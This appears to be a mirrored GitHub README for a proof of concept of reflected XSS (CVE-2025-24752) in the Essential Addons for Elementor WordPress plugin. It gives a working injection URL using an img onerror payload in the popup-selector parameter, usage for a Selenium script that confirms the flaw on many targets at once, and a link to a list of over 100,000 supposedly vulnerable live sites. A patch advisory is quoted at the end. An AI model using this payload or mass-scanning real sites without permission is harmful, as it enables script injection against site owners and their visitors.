来源

关联漏洞

描述

Hi, I am Chirag Artani. This is the POC of Reflected XSS in Essential Addons for Elementor Affecting 2+ Million Sites - CVE-2025-24752  

介绍

Please do not harm sites, FIX it ASAP
targets vulnerable 100K+ probably affecting for XSS https://nt.ls/AkTE9 (can download by one click all vulnerable)

##### Requirement to run poc.py, Install -

```pip install selenium webdriver-manager```

##### Usage 
```python poc.py targets.txt```

```For bulk it will take time but yes it is going to confirm the XSS, it works like browser, so yeah until XSS pop-up it waits to see and confirm.```

![image](https://github.com/user-attachments/assets/4167280d-787d-45cd-81eb-4a5c25368885)

#### manual POC elementor XSS 2025
 ==> ```https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1```

 
![image](https://github.com/user-attachments/assets/50d75f05-1392-4acf-9889-525e54ca5128)


Note: My script works slow, but it can 1000% confirm XSS bug unlike nuclei or httpx. I tried all the things, version below 6.0.15 are affected.

#### Information & reference 
https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
The Essential Addons for Elementor plugin suffered from a reflected cross-site scripting (XSS) vulnerability. The vulnerability occurred due to insufficient validation and sanitizing of the popup-selector query argument, allowing for a malicious value to be reflected back at the user. The vulnerability is fixed in version 6.0.15 and has been tracked with CVE-2025-24752.

文件快照

 [4.0K]  /data/pocs/7c40ea5190254c4ad71427b745589bc0cb4271b4
├── [6.0K]  poc.py
└── [1.4K]  README.md

0 directories, 2 files

备注